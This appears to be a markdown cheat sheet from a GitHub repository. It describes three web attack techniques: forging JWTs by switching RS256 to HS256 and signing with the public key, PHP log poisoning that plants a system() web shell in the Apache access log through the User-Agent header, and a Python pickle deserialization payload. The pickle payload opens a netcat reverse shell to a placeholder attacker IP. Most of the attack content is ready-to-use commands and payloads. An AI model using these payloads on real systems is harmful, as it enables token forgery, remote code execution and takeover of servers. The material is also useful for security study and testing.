Skip to content

Latest commit

 

History

History
93 lines (63 loc) · 2.57 KB

advanced.md

File metadata and controls

93 lines (63 loc) · 2.57 KB

JWT exploitation using public key

Change the algorithm (RS256 → HS256) and sign a new secret

  • Change the algorithm inside the JWT header
  • Convert the public key to hex so openssl will use it
cat key | xxd -p | tr -d "\\n"
  • Use openssl to sign that as a valid HS256 key.
echo -n <TOKEN> | openssl dgst -sha256 -mac HMAC -macopt hexkey:<KEY>
  • Decode that hex to binary data, and reencode it in base64
python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<SECRET>')).replace('=','')\")""
  • Replace the secret inside the JWT token.

Log Poisoning

What does it mean?

  • It is a common technique used to gain a reverse shell from a LFI vulnerability
  • To make it work an attacker attempts to inject malicious input to the server log

What are the signs of this bug?

  • Obviously you need to find an apache log file
  • The directory of the file should have read and execute permissions

How can I exploit this?

  • Insert the following malicious code in the user agent field
  • The PHP command will allow us to execute system commands by parsing the input to a GET parameter called poison
GET /v1/signin.php?page=/var/log/apache2/access.log HTTP/1.1
Host: example.com
User-Agent: Mozilla <?php system($_GET['poison']); ?> Firefox
Accept: text/html
Connection: close

Forward the request and add your parameter to the link.

http://target.com/v1/example.php?page=/var/log/apache2/access.log&poison=whoami

Insecure Deserialization

What does it mean?

  • Untrusted data is used to abuse the logic of an application
  • Replacing data processed by an application with malicious code

What are the signs of this bug?

  • You should look at all data being passed into the website and try to identify anything that looks like serialized data.
  • Serialized data can be identified relatively easily if you know the format that different languages use.

How can I find it?

  • Any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained.
  • A few examples of applications of this nature are:
    • E-Commerce Sites
    • Forums
    • API's
    • Application Runtimes (Tomcat, Jenkins, Jboss, etc)

Deserialized shell using pickle

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_IP 1337 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))